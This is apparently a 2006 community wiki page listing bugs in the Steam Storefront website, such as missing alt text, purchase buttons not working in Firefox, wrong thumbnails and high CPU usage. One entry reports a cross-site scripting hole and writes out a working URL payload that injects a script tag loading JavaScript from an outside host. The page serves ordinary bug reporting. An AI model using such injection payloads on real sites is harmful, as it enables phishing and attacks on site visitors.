Awaiting Verification

This section contains bugs that the developer thinks have been fixed, but need verification from the submitters. If the bug isn't fixed, please elaborate on the repro steps, because it's most likely that the developer has only found one case, or have fixed a separate but similar bug. - Alden

Please move fixed issues to the section below and add "After update: Verified Fixed by ~~~".

Half-Life 2 Episode 1 Trailer has wrong thumbnail

Missing stripslashes()

  • Expected: When searching for a game with a ' in the name, the code should do a stripslashes() on the variable before outputting the text to the input box.
  • Observed: When searching for a game with a ' in the name, the search input box displays a \ before the '
  • Steps to reproduce: Search for a game with a ' in the name.

Front page capsules missing alt text

Now that tables have been dumped stuff like imageless browsing (and even small-screen rendering) works quite well. The rotating capsules on the front page are missing the alt attribute however, which makes it sort of tricky to tell what's what without the images! Search engine bots will have a hard time too. --TomEdwards 01:03, 6 Aug 2006 (PDT)

This is incredibly nit-picky, as if the whole bug wasn't nitpicky to start with, but the alt text is currently black on a black background until mouseover. --TomEdwards 14:02, 8 Aug 2006 (PDT)
Does this still happen? Chris Bokitch 15:18, 8 Aug 2006 (PDT)

CD-ROM included as minimum system specs in Disciples II

  • Expected: No CD requirement when running through steam
  • Observed: Says you need a quad speed CDROM.
  • Steps to reproduce: Simply look at the minimum specs section of the game page. Problem is in both rise of the elves, and Galleans Return

Cannot purchase first package in Firefox

  • Expected: clicking first package button on a page initiates purchase
  • Observed: clicking first package button has no effect. Other package buttons work normally.
  • Steps to reproduce: Visit the page for any game that is not free, click the first package button.

SiN 1 Multiplayer (http://storefront.steampowered.com/v/index.php?area=game&AppId=1309&) Seems to work OK. --TomEdwards 01:38, 3 Aug 2006 (PDT)
As does HL2DM (http://storefront.steampowered.com/v/index.php?area=game&AppId=320&). --TomEdwards 01:53, 3 Aug 2006 (PDT)
Can you give me an example of a page where this does not work? We had some issues before with "Birth of America" but those have been resolved. Is anyone else experiencing this problem? Alden 17:00, 3 Aug 2006 (PDT)
[1] (http://storefront.steampowered.com/v/index.php?area=game&AppId=1500), [2] (http://storefront.steampowered.com/v/index.php?area=game&AppId=300), [3] (http://storefront.steampowered.com/v/index.php?area=game&AppId=2500), [4] (http://storefront.steampowered.com/v/index.php?area=game&AppId=2810), [5] (http://storefront.steampowered.com/v/index.php?area=game&AppId=380)...just about all of them really. Media files and mod links work fine. It was working for a while last night. --TomEdwards 00:59, 4 Aug 2006 (PDT)
I just randomly tried again, and the Shadowgrounds link above worked. None of the other did, and when I reloaded the Shadowgrounds page and tried a second time it didn't either. --TomEdwards 04:39, 4 Aug 2006 (PDT)
Of those links, I was only able to reproduce it with HL2E1--and even that worked after a refresh. (And using the Steam client instead of Firefox, they all worked the first time.) Are you trying to do this in a browser or in Steam? And if it's in Firefox, have you tried without extensions? --ATimson 06:17, 4 Aug 2006 (PDT)
Firefox 1.5.0.5 and 1.5.0.6, both with my extensions and in the browser's safe mode. --TomEdwards 07:07, 4 Aug 2006 (PDT)
Could not reproduce in FF 1.5.0.6 (or IE6, or Steam client). Chris Bokitch 13:21, 8 Aug 2006 (PDT)
This now appears to be fixed. All first packages I've tried this evening work. --TomEdwards 13:54, 8 Aug 2006 (PDT)

Developer side links don't work

  • Expected: When clicking on a developer on the right sidebar a list of the developers games should appear.
  • Observed: The page returns 'No search results were returned for that query.'. (Looks like a typo in the SQL query - its trying to order by a field called 'Pricme'
  • Steps to reproduce: Click on Browse Games, then a developer name on the right of the page.
  • Morthy 02:45, 5 Aug 2006 (PDT)
    • Works ok for me. What developer are you clicking on? Chris Bokitch 15:50, 7 Aug 2006 (PDT)

MINERVA mistitled

If we're changing the entry, how about a better header image and a more suitable blurb too? A screen from Metastasis 2 perhaps? --TomEdwards 05:30, 8 Aug 2006 (PDT)

Videos continue playing when Steam window is closed

  • Expected: Thumbnail videos stop playing when the Steam window is closed
  • Observerd: They can be heard playing, even with no Steam windows open.
  • TomEdwards 11:17, 8 Aug 2006 (PDT)
  • Talked to the Steam devs. This is a side effect of Steam's browser implementation. (Not an IE/FF thing, so don't even start!) Closing the main Steam/Storefront window is like minimizing a browser. Will keep an eye on this for future development.
  • Verified as unfixable by Chris Bokitch 11:38, 8 Aug 2006 (PDT)
Is it not possible for Steam to pass a command to the flash file when its window is closed? --TomEdwards 13:36, 8 Aug 2006 (PDT)

Dystopia placeholder logo

  • Expected: This header image (http://dystopia-game.com/images/dystopia_header.jpg) to be used on the Dystopia page
    • broken link?
      • Link is corrected
  • Observed: Placeholder header image used on Dystopia page
  • Steps to reproduce: Click this link (http://storefront.steampowered.com/v/index.php?area=game&AppId=90023&s=0,7,9,25,63,90&i=0,10,300,320,340,2400,903,912,913,914,1200,205,211,219,220,240&client=1)

Half-Life Deathmatch: Source shown as HL2 mod

  • Expected: Only third-party mods are listed on the HL2 Mods (http://storefront.steampowered.com/v/index.php?area=search&browse=1&category=6) category page, not Valve games (especially standalone ones).
  • Observed: On the HL2 Mods category page, HLDMS is listed.

Half-Life 2 Episode One thumbnail vid links to wrong media

  • Expected: Link underneath thumbnail vid goes to media file being shown in the thumbnail.
  • Observed: Teaser 2 was shown, but the Ep1 Trailer was linked to.
  • Steps to reproduce: Cannot reproduce. It now links to Teaser 2 when that thumbnail comes around.

Sin Episodes listed as multiplayer

  • Expected: Sin Episodes should be listed only in the Single Player category, not Multiplayer as well. While multiplayer has been announced, it is not yet available, and thus potentially opens Valve up to some rather nasty breach-of-agreement charges.
  • Observed: Sin Episodes is on the list of multiplayer games (http://storefront.steampowered.com/v/index.php?area=search&browse=1&category=1).
  • Steps to reproduce: Go to the list of multiplayer games.

Security hole allows inserting malicious JS code

  • Expected: When clicking on a developers name from the browse page, the resulting page outputs something like 'Searching for games where developer is $whateveryouentered'. The code should strip html tags from the parameters passed on in the URL.
  • Observed: The code does not strip html tags, allowing a user to enter malicious html code into the page. For example, if you called the page with this as the developer url parameter: <script%20src=http://www.londinivm.com/js.js></script> then any javascript in the included file will be executed on the page. The JS could display inappropiate images, or a fake order form, or anything like that.
  • Steps to reproduce: Navigate to this url: http://storefront.steampowered.com/v/index.php?area=search&browse=1&developer=<script%20src=http://www.londinivm.com/js.js></script>

Session Hash Remains in Forums Link

  • Expected: No session hashes to show up for any links to the forums for specific games.
  • Observed: The session hash from the person gathering the forum link for Red Orchestra is there - Direct C&P from the storefront link (http://forums.steampowered.com/forums/forumdisplay.php?s=6f4579ac9e98d424559636b09ac6522a&forumid=62)
  • Also session hashes for Shadowgrounds, X2, X3, TFC, The Ship, Space Empires, HL: Opposing Force, RDKF, HL: Source, HL DM: Source, HL2: Lost Coast, and Earth 2160 (These are the ones I noticed)
  • Steps to reproduce: Right click on the link to the forums for RO and "copy shortcut"

Other

Not really a bug, but annoying: Adding a media file

  • Expected: When adding a media file, you get a popup asking if you want to continue browsing or play the media. You cant play it because it take time to download, and you cant shut that question off.
  • Observed: When adding a trailer to my media.
  • Steps to reproduce: Add whatever trailer to your media.

  • This is a Steam issue, not a Storefront issue. Chris Bokitch 12:15, 8 Aug 2006 (PDT)

High CPU usage while browsing the store

  • Expected: Low CPU usage while browsing the store
  • Observed: Especially while hovering the cursor over links or scrolling up/down there's really high (50-90%) CPU usage. Firefox and the standalone version of IE use much less CPU.
  • Steps to reproduce: Open the Steam Store and hover your cursor over one of the game images while watching your CPU usage with a tool of your choice.

--Koraktor 17:18, 2 Aug 2006 (PDT)

I managed to make the IE control lock up entirely after a frantic burst of resizing, scrolling and moving. The rest of the Steam window acted normally, and I was able to close it and free up the cycles, but the Store page was unusable. --TomEdwards 06:20, 3 Aug 2006 (PDT)
